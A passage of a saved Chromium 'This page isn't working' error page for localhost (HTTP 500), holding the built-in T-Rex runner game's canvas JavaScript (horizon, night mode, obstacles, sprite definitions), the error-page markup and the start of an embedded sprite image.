  draw() {
    this.canvasCtx.save();
    let sourceWidth = this.spriteConfig.WIDTH;
    let sourceHeight = this.spriteConfig.HEIGHT;
    let sourceX = this.spriteConfig.X_POS;
    const outputWidth = sourceWidth;
    const outputHeight = sourceHeight;

    if (IS_HIDPI) {
      sourceWidth *= 2;
      sourceHeight *= 2;
      sourceX *= 2;
    }

    this.canvasCtx.drawImage(
        Runner.imageSprite, sourceX, this.spritePos.y, sourceWidth,
        sourceHeight, this.xPos, this.yPos, outputWidth, outputHeight);

    this.canvasCtx.restore();
  },

  /**
   * Update the background element position.
   * @param {number} speed
   */
  update(speed) {
    if (!this.remove) {
      if (this.spriteConfig.FIXED) {
        this.animTimer += speed;
        if (this.animTimer > BackgroundEl.config.MS_PER_FRAME) {
          this.animTimer = 0;
          this.switchFrames = !this.switchFrames;
        }

        if (this.spriteConfig.FIXED_Y_POS_1 &&
            this.spriteConfig.FIXED_Y_POS_2) {
          this.yPos = this.switchFrames ? this.spriteConfig.FIXED_Y_POS_1 :
                                          this.spriteConfig.FIXED_Y_POS_2;
        }
      } else {
        // Fixed speed, regardless of actual game speed.
        this.xPos -= BackgroundEl.config.SPEED;
      }
      this.draw();

      // Mark as removable if no longer in the canvas.
      if (!this.isVisible()) {
        this.remove = true;
      }
    }
  },

  /**
   * Check if the element is visible on the stage.
   * @return {boolean}
   */
  isVisible() {
    return this.xPos + this.spriteConfig.WIDTH > 0;
  },
};



//******************************************************************************

/**
 * Nightmode shows a moon and stars on the horizon.
 * @param {HTMLCanvasElement} canvas
 * @param {number} spritePos
 * @param {number} containerWidth
 * @constructor
 */
function NightMode(canvas, spritePos, containerWidth) {
  this.spritePos = spritePos;
  this.canvas = canvas;
  this.canvasCtx =
      /** @type {CanvasRenderingContext2D} */ (canvas.getContext('2d'));
  this.xPos = containerWidth - 50;
  this.yPos = 30;
  this.currentPhase = 0;
  this.opacity = 0;
  this.containerWidth = containerWidth;
  this.stars = [];
  this.drawStars = false;
  this.placeStars();
}

/**
 * @enum {number}
 */
NightMode.config = {
  FADE_SPEED: 0.035,
  HEIGHT: 40,
  MOON_SPEED: 0.25,
  NUM_STARS: 2,
  STAR_SIZE: 9,
  STAR_SPEED: 0.3,
  STAR_MAX_Y: 70,
  WIDTH: 20,
};

NightMode.phases = [140, 120, 100, 60, 40, 20, 0];

NightMode.prototype = {
  /**
   * Update moving moon, changing phases.
   * @param {boolean} activated Whether night mode is activated.
   */
  update(activated) {
    // Moon phase.
    if (activated && this.opacity === 0) {
      this.currentPhase++;

      if (this.currentPhase >= NightMode.phases.length) {
        this.currentPhase = 0;
      }
    }

    // Fade in / out.
    if (activated && (this.opacity < 1 || this.opacity === 0)) {
      this.opacity += NightMode.config.FADE_SPEED;
    } else if (this.opacity > 0) {
      this.opacity -= NightMode.config.FADE_SPEED;
    }

    // Set moon positioning.
    if (this.opacity > 0) {
      this.xPos = this.updateXPos(this.xPos, NightMode.config.MOON_SPEED);

      // Update stars.
      if (this.drawStars) {
        for (let i = 0; i < NightMode.config.NUM_STARS; i++) {
          this.stars[i].x =
              this.updateXPos(this.stars[i].x, NightMode.config.STAR_SPEED);
        }
      }
      this.draw();
    } else {
      this.opacity = 0;
      this.placeStars();
    }
    this.drawStars = true;
  },

  updateXPos(currentPos, speed) {
    if (currentPos < -NightMode.config.WIDTH) {
      currentPos = this.containerWidth;
    } else {
      currentPos -= speed;
    }
    return currentPos;
  },

  draw() {
    let moonSourceWidth = this.currentPhase === 3 ? NightMode.config.WIDTH * 2 :
                                                    NightMode.config.WIDTH;
    let moonSourceHeight = NightMode.config.HEIGHT;
    let moonSourceX = this.spritePos.x + NightMode.phases[this.currentPhase];
    const moonOutputWidth = moonSourceWidth;
    let starSize = NightMode.config.STAR_SIZE;
    let starSourceX = Runner.spriteDefinitionByType.original.LDPI.STAR.x;

    if (IS_HIDPI) {
      moonSourceWidth *= 2;
      moonSourceHeight *= 2;
      moonSourceX = this.spritePos.x +
          (NightMode.phases[this.currentPhase] * 2);
      starSize *= 2;
      starSourceX = Runner.spriteDefinitionByType.original.HDPI.STAR.x;
    }

    this.canvasCtx.save();
    this.canvasCtx.globalAlpha = this.opacity;

    // Stars.
    if (this.drawStars) {
      for (let i = 0; i < NightMode.config.NUM_STARS; i++) {
        this.canvasCtx.drawImage(
            Runner.origImageSprite, starSourceX, this.stars[i].sourceY,
            starSize, starSize, Math.round(this.stars[i].x), this.stars[i].y,
            NightMode.config.STAR_SIZE, NightMode.config.STAR_SIZE);
      }
    }

    // Moon.
    this.canvasCtx.drawImage(
        Runner.origImageSprite, moonSourceX, this.spritePos.y, moonSourceWidth,
        moonSourceHeight, Math.round(this.xPos), this.yPos, moonOutputWidth,
        NightMode.config.HEIGHT);

    this.canvasCtx.globalAlpha = 1;
    this.canvasCtx.restore();
  },

  // Do star placement.
  placeStars() {
    const segmentSize = Math.round(this.containerWidth /
        NightMode.config.NUM_STARS);

    for (let i = 0; i < NightMode.config.NUM_STARS; i++) {
      this.stars[i] = {};
      this.stars[i].x = getRandomNum(segmentSize * i, segmentSize * (i + 1));
      this.stars[i].y = getRandomNum(0, NightMode.config.STAR_MAX_Y);

      if (IS_HIDPI) {
        this.stars[i].sourceY =
            Runner.spriteDefinitionByType.original.HDPI.STAR.y +
            NightMode.config.STAR_SIZE * 2 * i;
      } else {
        this.stars[i].sourceY =
            Runner.spriteDefinitionByType.original.LDPI.STAR.y +
            NightMode.config.STAR_SIZE * i;
      }
    }
  },

  reset() {
    this.currentPhase = 0;
    this.opacity = 0;
    this.update(false);
  },

};


//******************************************************************************

/**
 * Horizon Line.
 * Consists of two connecting lines. Randomly assigns a flat / bumpy horizon.
 * @param {HTMLCanvasElement} canvas
 * @param {Object} lineConfig Configuration object.
 * @constructor
 */
function HorizonLine(canvas, lineConfig) {
  let sourceX = lineConfig.SOURCE_X;
  let sourceY = lineConfig.SOURCE_Y;

  if (IS_HIDPI) {
    sourceX *= 2;
    sourceY *= 2;
  }

  this.spritePos = {x: sourceX, y: sourceY};
  this.canvas = canvas;
  this.canvasCtx =
      /** @type {CanvasRenderingContext2D} */ (canvas.getContext('2d'));
  this.sourceDimensions = {};
  this.dimensions = lineConfig;

  this.sourceXPos = [this.spritePos.x, this.spritePos.x +
      this.dimensions.WIDTH];
  this.xPos = [];
  this.yPos = 0;
  this.bumpThreshold = 0.5;

  this.setSourceDimensions(lineConfig);
  this.draw();
}


/**
 * Horizon line dimensions.
 * @enum {number}
 */
HorizonLine.dimensions = {
  WIDTH: 600,
  HEIGHT: 12,
  YPOS: 127,
};


HorizonLine.prototype = {
  /**
   * Set the source dimensions of the horizon line.
   */
  setSourceDimensions(newDimensions) {
    for (const dimension in newDimensions) {
      if (dimension !== 'SOURCE_X' && dimension !== 'SOURCE_Y') {
        if (IS_HIDPI) {
          if (dimension !== 'YPOS') {
            this.sourceDimensions[dimension] = newDimensions[dimension] * 2;
          }
        } else {
          this.sourceDimensions[dimension] = newDimensions[dimension];
        }
        this.dimensions[dimension] = newDimensions[dimension];
      }
    }

    this.xPos = [0, newDimensions.WIDTH];
    this.yPos = newDimensions.YPOS;
  },

  /**
   * Return the crop x position of a type.
   */
  getRandomType() {
    return Math.random() > this.bumpThreshold ? this.dimensions.WIDTH : 0;
  },

  /**
   * Draw the horizon line.
   */
  draw() {
    this.canvasCtx.drawImage(Runner.imageSprite, this.sourceXPos[0],
        this.spritePos.y,
        this.sourceDimensions.WIDTH, this.sourceDimensions.HEIGHT,
        this.xPos[0], this.yPos,
        this.dimensions.WIDTH, this.dimensions.HEIGHT);

    this.canvasCtx.drawImage(Runner.imageSprite, this.sourceXPos[1],
        this.spritePos.y,
        this.sourceDimensions.WIDTH, this.sourceDimensions.HEIGHT,
        this.xPos[1], this.yPos,
        this.dimensions.WIDTH, this.dimensions.HEIGHT);
  },

  /**
   * Update the x position of an indivdual piece of the line.
   * @param {number} pos Line position.
   * @param {number} increment
   */
  updateXPos(pos, increment) {
    const line1 = pos;
    const line2 = pos === 0 ? 1 : 0;

    this.xPos[line1] -= increment;
    this.xPos[line2] = this.xPos[line1] + this.dimensions.WIDTH;

    if (this.xPos[line1] <= -this.dimensions.WIDTH) {
      this.xPos[line1] += this.dimensions.WIDTH * 2;
      this.xPos[line2] = this.xPos[line1] - this.dimensions.WIDTH;
      this.sourceXPos[line1] = this.getRandomType() + this.spritePos.x;
    }
  },

  /**
   * Update the horizon line.
   * @param {number} deltaTime
   * @param {number} speed
   */
  update(deltaTime, speed) {
    const increment = Math.floor(speed * (FPS / 1000) * deltaTime);

    if (this.xPos[0] <= 0) {
      this.updateXPos(0, increment);
    } else {
      this.updateXPos(1, increment);
    }
    this.draw();
  },

  /**
   * Reset horizon to the starting position.
   */
  reset() {
    this.xPos[0] = 0;
    this.xPos[1] = this.dimensions.WIDTH;
  },
};


//******************************************************************************

/**
 * Horizon background class.
 * @param {HTMLCanvasElement} canvas
 * @param {Object} spritePos Sprite positioning.
 * @param {Object} dimensions Canvas dimensions.
 * @param {number} gapCoefficient
 * @constructor
 */
function Horizon(canvas, spritePos, dimensions, gapCoefficient) {
  this.canvas = canvas;
  this.canvasCtx =
      /** @type {CanvasRenderingContext2D} */ (this.canvas.getContext('2d'));
  this.config = Horizon.config;
  this.dimensions = dimensions;
  this.gapCoefficient = gapCoefficient;
  this.obstacles = [];
  this.obstacleHistory = [];
  this.horizonOffsets = [0, 0];
  this.cloudFrequency = this.config.CLOUD_FREQUENCY;
  this.spritePos = spritePos;
  this.nightMode = null;
  this.altGameModeActive = false;

  // Cloud
  this.clouds = [];
  this.cloudSpeed = this.config.BG_CLOUD_SPEED;

  // Background elements
  this.backgroundEls = [];
  this.lastEl = null;
  this.backgroundSpeed = this.config.BG_CLOUD_SPEED;

  // Horizon
  this.horizonLine = null;
  this.horizonLines = [];
  this.init();
}


/**
 * Horizon config.
 * @enum {number}
 */
Horizon.config = {
  BG_CLOUD_SPEED: 0.2,
  BUMPY_THRESHOLD: .3,
  CLOUD_FREQUENCY: .5,
  HORIZON_HEIGHT: 16,
  MAX_CLOUDS: 6,
};


Horizon.prototype = {
  /**
   * Initialise the horizon. Just add the line and a cloud. No obstacles.
   */
  init() {
    Obstacle.types = Runner.spriteDefinitionByType.original.OBSTACLES;
    this.addCloud();
    // Multiple Horizon lines
    for (let i = 0; i < Runner.spriteDefinition.LINES.length; i++) {
      this.horizonLines.push(
          new HorizonLine(this.canvas, Runner.spriteDefinition.LINES[i]));
    }

    this.nightMode = new NightMode(this.canvas, this.spritePos.MOON,
        this.dimensions.WIDTH);
  },

  /**
   * Update obstacle definitions based on the speed of the game.
   */
  adjustObstacleSpeed: function() {
    for (let i = 0; i < Obstacle.types.length; i++) {
      if (Runner.slowDown) {
        Obstacle.types[i].multipleSpeed = Obstacle.types[i].multipleSpeed / 2;
        Obstacle.types[i].minGap *= 1.5;
        Obstacle.types[i].minSpeed = Obstacle.types[i].minSpeed / 2;

        // Convert variable y position obstacles to fixed.
        if (typeof (Obstacle.types[i].yPos) == 'object') {
          Obstacle.types[i].yPos = Obstacle.types[i].yPos[0];
          Obstacle.types[i].yPosMobile = Obstacle.types[i].yPos[0];
        }
      }
    }
  },

  /**
   * Update sprites to correspond to change in sprite sheet.
   * @param {number} spritePos
   */
  enableAltGameMode: function(spritePos) {
    // Clear existing horizon objects.
    this.clouds = [];
    this.backgroundEls = [];

    this.altGameModeActive = true;
    this.spritePos = spritePos;

    Obstacle.types = Runner.spriteDefinition.OBSTACLES;
    this.adjustObstacleSpeed();

    Obstacle.MAX_GAP_COEFFICIENT = Runner.spriteDefinition.MAX_GAP_COEFFICIENT;
    Obstacle.MAX_OBSTACLE_LENGTH = Runner.spriteDefinition.MAX_OBSTACLE_LENGTH;

    BackgroundEl.config = Runner.spriteDefinition.BACKGROUND_EL_CONFIG;

    this.horizonLines = [];
    for (let i = 0; i < Runner.spriteDefinition.LINES.length; i++) {
      this.horizonLines.push(
          new HorizonLine(this.canvas, Runner.spriteDefinition.LINES[i]));
    }
    this.reset();
  },

  /**
   * @param {number} deltaTime
   * @param {number} currentSpeed
   * @param {boolean} updateObstacles Used as an override to prevent
   *     the obstacles from being updated / added. This happens in the
   *     ease in section.
   * @param {boolean} showNightMode Night mode activated.
   */
  update(deltaTime, currentSpeed, updateObstacles, showNightMode) {
    this.runningTime += deltaTime;

    if (this.altGameModeActive) {
      this.updateBackgroundEls(deltaTime, currentSpeed);
    }

    for (let i = 0; i < this.horizonLines.length; i++) {
      this.horizonLines[i].update(deltaTime, currentSpeed);
    }

    if (!this.altGameModeActive || Runner.spriteDefinition.HAS_CLOUDS) {
      this.nightMode.update(showNightMode);
      this.updateClouds(deltaTime, currentSpeed);
    }

    if (updateObstacles) {
      this.updateObstacles(deltaTime, currentSpeed);
    }
  },

  /**
   * Update background element positions. Also handles creating new elements.
   * @param {number} elSpeed
   * @param {Array<Object>} bgElArray
   * @param {number} maxBgEl
   * @param {Function} bgElAddFunction
   * @param {number} frequency
   */
  updateBackgroundEl(elSpeed, bgElArray, maxBgEl, bgElAddFunction, frequency) {
    const numElements = bgElArray.length;

    if (numElements) {
      for (let i = numElements - 1; i >= 0; i--) {
        bgElArray[i].update(elSpeed);
      }

      const lastEl = bgElArray[numElements - 1];

      // Check for adding a new element.
      if (numElements < maxBgEl &&
          (this.dimensions.WIDTH - lastEl.xPos) > lastEl.gap &&
          frequency > Math.random()) {
        bgElAddFunction();
      }
    } else {
      bgElAddFunction();
    }
  },

  /**
   * Update the cloud positions.
   * @param {number} deltaTime
   * @param {number} speed
   */
  updateClouds(deltaTime, speed) {
    const elSpeed = this.cloudSpeed / 1000 * deltaTime * speed;
    this.updateBackgroundEl(
        elSpeed, this.clouds, this.config.MAX_CLOUDS, this.addCloud.bind(this),
        this.cloudFrequency);

    // Remove expired elements.
    this.clouds = this.clouds.filter((obj) => !obj.remove);
  },

  /**
   * Update the background element positions.
   * @param {number} deltaTime
   * @param {number} speed
   */
  updateBackgroundEls(deltaTime, speed) {
    this.updateBackgroundEl(
        deltaTime, this.backgroundEls, BackgroundEl.config.MAX_BG_ELS,
        this.addBackgroundEl.bind(this), this.cloudFrequency);

    // Remove expired elements.
    this.backgroundEls = this.backgroundEls.filter((obj) => !obj.remove);
  },

  /**
   * Update the obstacle positions.
   * @param {number} deltaTime
   * @param {number} currentSpeed
   */
  updateObstacles(deltaTime, currentSpeed) {
    const updatedObstacles = this.obstacles.slice(0);

    for (let i = 0; i < this.obstacles.length; i++) {
      const obstacle = this.obstacles[i];
      obstacle.update(deltaTime, currentSpeed);

      // Clean up existing obstacles.
      if (obstacle.remove) {
        updatedObstacles.shift();
      }
    }
    this.obstacles = updatedObstacles;

    if (this.obstacles.length > 0) {
      const lastObstacle = this.obstacles[this.obstacles.length - 1];

      if (lastObstacle && !lastObstacle.followingObstacleCreated &&
          lastObstacle.isVisible() &&
          (lastObstacle.xPos + lastObstacle.width + lastObstacle.gap) <
          this.dimensions.WIDTH) {
        this.addNewObstacle(currentSpeed);
        lastObstacle.followingObstacleCreated = true;
      }
    } else {
      // Create new obstacles.
      this.addNewObstacle(currentSpeed);
    }
  },

  removeFirstObstacle() {
    this.obstacles.shift();
  },

  /**
   * Add a new obstacle.
   * @param {number} currentSpeed
   */
  addNewObstacle(currentSpeed) {
    const obstacleCount =
        Obstacle.types[Obstacle.types.length - 1].type != 'COLLECTABLE' ||
            (Runner.isAltGameModeEnabled() && !this.altGameModeActive ||
             this.altGameModeActive) ?
        Obstacle.types.length - 1 :
        Obstacle.types.length - 2;
    const obstacleTypeIndex =
        obstacleCount > 0 ? getRandomNum(0, obstacleCount) : 0;
    const obstacleType = Obstacle.types[obstacleTypeIndex];

    // Check for multiples of the same type of obstacle.
    // Also check obstacle is available at current speed.
    if ((obstacleCount > 0 && this.duplicateObstacleCheck(obstacleType.type)) ||
        currentSpeed < obstacleType.minSpeed) {
      this.addNewObstacle(currentSpeed);
    } else {
      const obstacleSpritePos = this.spritePos[obstacleType.type];

      this.obstacles.push(new Obstacle(
          this.canvasCtx, obstacleType, obstacleSpritePos, this.dimensions,
          this.gapCoefficient, currentSpeed, obstacleType.width,
          this.altGameModeActive));

      this.obstacleHistory.unshift(obstacleType.type);

      if (this.obstacleHistory.length > 1) {
        this.obstacleHistory.splice(Runner.config.MAX_OBSTACLE_DUPLICATION);
      }
    }
  },

  /**
   * Returns whether the previous two obstacles are the same as the next one.
   * Maximum duplication is set in config value MAX_OBSTACLE_DUPLICATION.
   * @return {boolean}
   */
  duplicateObstacleCheck(nextObstacleType) {
    let duplicateCount = 0;

    for (let i = 0; i < this.obstacleHistory.length; i++) {
      duplicateCount =
          this.obstacleHistory[i] === nextObstacleType ? duplicateCount + 1 : 0;
    }
    return duplicateCount >= Runner.config.MAX_OBSTACLE_DUPLICATION;
  },

  /**
   * Reset the horizon layer.
   * Remove existing obstacles and reposition the horizon line.
   */
  reset() {
    this.obstacles = [];
    for (let l = 0; l < this.horizonLines.length; l++) {
      this.horizonLines[l].reset();
    }

    this.nightMode.reset();
  },

  /**
   * Update the canvas width and scaling.
   * @param {number} width Canvas width.
   * @param {number} height Canvas height.
   */
  resize(width, height) {
    this.canvas.width = width;
    this.canvas.height = height;
  },

  /**
   * Add a new cloud to the horizon.
   */
  addCloud() {
    this.clouds.push(new Cloud(this.canvas, this.spritePos.CLOUD,
        this.dimensions.WIDTH));
  },

  /**
   * Add a random background element to the horizon.
   */
  addBackgroundEl() {
    const backgroundElTypes =
        Object.keys(Runner.spriteDefinition.BACKGROUND_EL);

    if (backgroundElTypes.length > 0) {
      let index = getRandomNum(0, backgroundElTypes.length - 1);
      let type = backgroundElTypes[index];

      // Add variation if available.
      while (type == this.lastEl && backgroundElTypes.length > 1) {
        index = getRandomNum(0, backgroundElTypes.length - 1);
        type = backgroundElTypes[index];
      }

      this.lastEl = type;
      this.backgroundEls.push(new BackgroundEl(
          this.canvas, this.spritePos.BACKGROUND_EL, this.dimensions.WIDTH,
          type));
    }
  },
};
</script>
  <script>// Copyright 2021 The Chromium Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

/* @const
 * Add matching sprite definition and config to Runner.spriteDefinitionByType.
 */
const GAME_TYPE = [];

/**
 * Obstacle definitions.
 * minGap: minimum pixel space between obstacles.
 * multipleSpeed: Speed at which multiples are allowed.
 * speedOffset: speed faster / slower than the horizon.
 * minSpeed: Minimum speed which the obstacle can make an appearance.
 *
 * @typedef {{
 *   type: string,
 *   width: number,
 *   height: number,
 *   yPos: number,
 *   multipleSpeed: number,
 *   minGap: number,
 *   minSpeed: number,
 *   collisionBoxes: Array<CollisionBox>,
 * }}
 */
let ObstacleType;

/**
 * T-Rex runner sprite definitions.
 */
Runner.spriteDefinitionByType = {
  original: {
    LDPI: {
      BACKGROUND_EL: {x: 86, y: 2},
      CACTUS_LARGE: {x: 332, y: 2},
      CACTUS_SMALL: {x: 228, y: 2},
      OBSTACLE_2: {x: 332, y: 2},
      OBSTACLE: {x: 228, y: 2},
      CLOUD: {x: 86, y: 2},
      HORIZON: {x: 2, y: 54},
      MOON: {x: 484, y: 2},
      PTERODACTYL: {x: 134, y: 2},
      RESTART: {x: 2, y: 68},
      TEXT_SPRITE: {x: 655, y: 2},
      TREX: {x: 848, y: 2},
      STAR: {x: 645, y: 2},
      COLLECTABLE: {x: 2, y: 2},
      ALT_GAME_END: {x: 121, y: 2},
    },
    HDPI: {
      BACKGROUND_EL: {x: 166, y: 2},
      CACTUS_LARGE: {x: 652, y: 2},
      CACTUS_SMALL: {x: 446, y: 2},
      OBSTACLE_2: {x: 652, y: 2},
      OBSTACLE: {x: 446, y: 2},
      CLOUD: {x: 166, y: 2},
      HORIZON: {x: 2, y: 104},
      MOON: {x: 954, y: 2},
      PTERODACTYL: {x: 260, y: 2},
      RESTART: {x: 2, y: 130},
      TEXT_SPRITE: {x: 1294, y: 2},
      TREX: {x: 1678, y: 2},
      STAR: {x: 1276, y: 2},
      COLLECTABLE: {x: 4, y: 4},
      ALT_GAME_END: {x: 242, y: 4},
    },
    MAX_GAP_COEFFICIENT: 1.5,
    MAX_OBSTACLE_LENGTH: 3,
    HAS_CLOUDS: 1,
    BOTTOM_PAD: 10,
    TREX: {
      WAITING_1: {x: 44, w: 44, h: 47, xOffset: 0},
      WAITING_2: {x: 0, w: 44, h: 47, xOffset: 0},
      RUNNING_1: {x: 88, w: 44, h: 47, xOffset: 0},
      RUNNING_2: {x: 132, w: 44, h: 47, xOffset: 0},
      JUMPING: {x: 0, w: 44, h: 47, xOffset: 0},
      CRASHED: {x: 220, w: 44, h: 47, xOffset: 0},
      COLLISION_BOXES: [
        new CollisionBox(22, 0, 17, 16),
        new CollisionBox(1, 18, 30, 9),
        new CollisionBox(10, 35, 14, 8),
        new CollisionBox(1, 24, 29, 5),
        new CollisionBox(5, 30, 21, 4),
        new CollisionBox(9, 34, 15, 4),
      ],
    },
    /** @type {Array<ObstacleType>} */
    OBSTACLES: [
      {
        type: 'CACTUS_SMALL',
        width: 17,
        height: 35,
        yPos: 105,
        multipleSpeed: 4,
        minGap: 120,
        minSpeed: 0,
        collisionBoxes: [
          new CollisionBox(0, 7, 5, 27),
          new CollisionBox(4, 0, 6, 34),
          new CollisionBox(10, 4, 7, 14),
        ],
      },
      {
        type: 'CACTUS_LARGE',
        width: 25,
        height: 50,
        yPos: 90,
        multipleSpeed: 7,
        minGap: 120,
        minSpeed: 0,
        collisionBoxes: [
          new CollisionBox(0, 12, 7, 38),
          new CollisionBox(8, 0, 7, 49),
          new CollisionBox(13, 10, 10, 38),
        ],
      },
      {
        type: 'PTERODACTYL',
        width: 46,
        height: 40,
        yPos: [100, 75, 50],    // Variable height.
        yPosMobile: [100, 50],  // Variable height mobile.
        multipleSpeed: 999,
        minSpeed: 8.5,
        minGap: 150,
        collisionBoxes: [
          new CollisionBox(15, 15, 16, 5),
          new CollisionBox(18, 21, 24, 6),
          new CollisionBox(2, 14, 4, 3),
          new CollisionBox(6, 10, 4, 7),
          new CollisionBox(10, 8, 6, 9),
        ],
        numFrames: 2,
        frameRate: 1000 / 6,
        speedOffset: .8,
      },
    ],
    BACKGROUND_EL: {
      'CLOUD': {
        HEIGHT: 14,
        MAX_CLOUD_GAP: 400,
        MAX_SKY_LEVEL: 30,
        MIN_CLOUD_GAP: 100,
        MIN_SKY_LEVEL: 71,
        OFFSET: 4,
        WIDTH: 46,
        X_POS: 1,
        Y_POS: 120,
      },
    },
    BACKGROUND_EL_CONFIG: {
      MAX_BG_ELS: 1,
      MAX_GAP: 400,
      MIN_GAP: 100,
      POS: 0,
      SPEED: 0.5,
      Y_POS: 125,
    },
    LINES: [
      {SOURCE_X: 2, SOURCE_Y: 52, WIDTH: 600, HEIGHT: 12, YPOS: 127},
    ],
  },
};
</script>
  
</head>
<body id="t" class="neterror" style="font-family: &quot;sans&quot;, Arial, sans-serif; font-size: 75%" jstcache="0">
  <div id="main-frame-error" class="interstitial-wrapper" jstcache="0">
    <div id="main-content" jstcache="0">
      <div class="icon icon-generic" jstcache="0"></div>
      <div id="main-message" jstcache="0">
        <h1 jstcache="0">
          <span jsselect="heading" jsvalues=".innerHTML:msg" jstcache="9">This page isn’t working</span>
          <a id="error-information-button" class="hidden" onclick="toggleErrorInformationPopup();" jstcache="0"></a>
        </h1>
        <p jsselect="summary" jsvalues=".innerHTML:msg" jstcache="1"><strong jscontent="hostName" jstcache="22">localhost</strong> is currently unable to handle this request.</p>
        <!--The suggestion list and error code are normally presented inline,
          in which case error-information-popup-* divs have no effect. When
          error-information-popup-container has the use-popup-container class, this
          information is provided in a popup instead.-->
        <div id="error-information-popup-container" jstcache="0">
          <div id="error-information-popup" jstcache="0">
            <div id="error-information-popup-box" jstcache="0">
              <div id="error-information-popup-content" jstcache="0">
                <div id="suggestions-list" style="display:none" jsdisplay="(suggestionsSummaryList &amp;&amp; suggestionsSummaryList.length)" jstcache="16">
                  <p jsvalues=".innerHTML:suggestionsSummaryListHeader" jstcache="18"></p>
                  <ul jsvalues=".className:suggestionsSummaryList.length == 1 ? 'single-suggestion' : ''" jstcache="19">
                    <li jsselect="suggestionsSummaryList" jsvalues=".innerHTML:summary" jstcache="21"></li>
                  </ul>
                </div>
                <div class="error-code" jscontent="errorCode" jstcache="17">HTTP ERROR 500</div>
                <p id="error-information-popup-close" jstcache="0">
                  <a class="link-button" jscontent="closeDescriptionPopup" onclick="toggleErrorInformationPopup();" jstcache="20">null</a>
                </p>
              </div>
            </div>
          </div>
        </div>
        <div id="download-links-wrapper" class="hidden" jstcache="0">
          <div id="download-link-wrapper" jstcache="0">
            <a id="download-link" class="link-button" onclick="downloadButtonClick()" jsselect="downloadButton" jscontent="msg" jsvalues=".disabledText:disabledMsg" jstcache="6" style="display: none;">
            </a>
          </div>
          <div id="download-link-clicked-wrapper" class="hidden" jstcache="0">
            <div id="download-link-clicked" class="link-button" jsselect="downloadButton" jscontent="disabledMsg" jstcache="11" style="display: none;">
            </div>
          </div>
        </div>
        <div id="save-page-for-later-button" class="hidden" jstcache="0">
          <a class="link-button" onclick="savePageLaterClick()" jsselect="savePageLater" jscontent="savePageMsg" jstcache="10" style="display: none;">
          </a>
        </div>
        <div id="cancel-save-page-button" class="hidden" onclick="cancelSavePageClick()" jsselect="savePageLater" jsvalues=".innerHTML:cancelMsg" jstcache="4" style="display: none;">
        </div>
        <div id="offline-content-list" class="list-hidden" hidden="" jstcache="0">
          <div id="offline-content-list-visibility-card" onclick="toggleOfflineContentListVisibility(true)" jstcache="0">
            <div id="offline-content-list-title" jsselect="offlineContentList" jscontent="title" jstcache="12" style="display: none;">
            </div>
            <div jstcache="0">
              <div id="offline-content-list-show-text" jsselect="offlineContentList" jscontent="showText" jstcache="14" style="display: none;">
              </div>
              <div id="offline-content-list-hide-text" jsselect="offlineContentList" jscontent="hideText" jstcache="15" style="display: none;">
              </div>
            </div>
          </div>
          <div id="offline-content-suggestions" jstcache="0"></div>
          <div id="offline-content-list-action" jstcache="0">
            <a class="link-button" onclick="launchDownloadsPage()" jsselect="offlineContentList" jscontent="actionText" jstcache="13" style="display: none;">
            </a>
          </div>
        </div>
      </div>
    </div>
    <div id="buttons" class="nav-wrapper suggested-right" jstcache="0">
      <div id="control-buttons" jstcache="0">
        <button id="reload-button" class="blue-button text-button" onclick="reloadButtonClick(this.url);" jsselect="reloadButton" jsvalues=".url:reloadUrl" jscontent="msg" jstcache="5">Reload</button>
        <button id="download-button" class="blue-button text-button" onclick="downloadButtonClick()" jsselect="downloadButton" jscontent="msg" jsvalues=".disabledText:disabledMsg" jstcache="6" style="display: none;">
        </button>
      </div>
      <button id="details-button" class="secondary-button text-button small-link" onclick="detailsButtonClick(); toggleHelpBox()" jscontent="details" jsdisplay="(suggestionsDetails &amp;&amp; suggestionsDetails.length > 0) || diagnose" jsvalues=".detailsText:details; .hideDetailsText:hideDetails;" jstcache="2" style="display: none;"></button>
    </div>
    <div id="details" class="hidden" jstcache="0">
      <div class="suggestions" jsselect="suggestionsDetails" jstcache="3" jsinstance="*0" style="display: none;">
        <div class="suggestion-header" jsvalues=".innerHTML:header" jstcache="7"></div>
        <div class="suggestion-body" jsvalues=".innerHTML:body" jstcache="8"></div>
      </div>
    </div>
  </div>
  <div id="sub-frame-error" jstcache="0">
    <!-- Show details when hovering over the icon, in case the details are
         hidden because they're too large. -->
    <div class="icon" jstcache="0"></div>
    <div id="sub-frame-error-details" jsselect="summary" jsvalues=".innerHTML:msg" jstcache="1"><strong jscontent="hostName" jstcache="22">localhost</strong> is currently unable to handle this request.</div>
  </div>

  <div id="offline-resources" jstcache="0">
    <img id="offline-resources-1x" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABNEAAABkBAMAAABayruYAAAAJFBMVEUAAADa2tr/////9/e6urpTU1O5ubn39/f///9ZWVlfX1/z8/O/OctmAAAACXRSTlMA//////////ZO3iNwAAALPElEQVR4AezdwY6bShMF4GP6krX9Bqgk9kiI/SzyAAir9lnlFfL6N26OWhXckDae9mClj/L7L1czMMbfbYDMOCgpKSkpwelyRmIEd6mEhTQpDabvu1C7vsf2ALM6cLlctquVtq2YDwC1jrfHEVDV8fagvln7p7XOlUKVi9SKWrncY5GQnN0DhLuZ1HZJa7WZPemU0GCc6hUMBtVue4BZHeD3v1caTn9KIyiPSimIvjw8SqtDVaQlvKrT2e91JEVUsEilOtGTNkkNUglWnFLX1oDrWSwGSOZ8V91CRczFDnBkWVEaKG0WBISZDPOTeeD2MIZK/Sz4YESUkbxdRhlkTXTrJ74d+aQ1bFRPSRvYjUuLmLOKmNjIch3/fQesGygrHW/SyO2WWzWmSyvSHjpVE1WJSWsIqwJk0agmSmsb39gnzbGKSaOXyJTGKmFSA6vvv/Nh3NQaDpyjPWaCp22mt0+ahkj+LlTzU4tu3Ujjrt4nrZoIq20qlT8brW/4k7S5sQGq73ZJO+M5aawjc5pHRmmYLxMozY/64llp8oAeeaQrMWkir5EGnSPLg8aZ6OaIrJ3n8WsX0lptPCy5ldOiYaT5xro0p9cEaa7nAENd99DOrEzIK0btxOrDSKMl0JeyCgugtr2DSWunmDR2Xy7tdF7c7MgmrfmLNDa7LWmOX9pllzbSDac0UBqrpTQOHOboeQBpIWJOjU3Oq8dItu+pNZRWLaWFBg+nnyBt6FhxIMIrVGxfFqGujcuDj/lkf6S0EeYC9E5aGDiUtAMcPUNkMZ8xl/Oj0qqJ0tomSFs2xDfkaWlOr1FpZzwrzU5qP3jn1px/qeroQUGVDyR2q/hs9X5auSI44T5nLheTJkppdnDpiNJCY1ta3wVQcB2lceBrpH3Dj29F2qdKO50vEWunl0qb6RDUcO0ojQOGYFya6++gnVlRGiubIO1CXgtq+IFPTZF2AeJvBB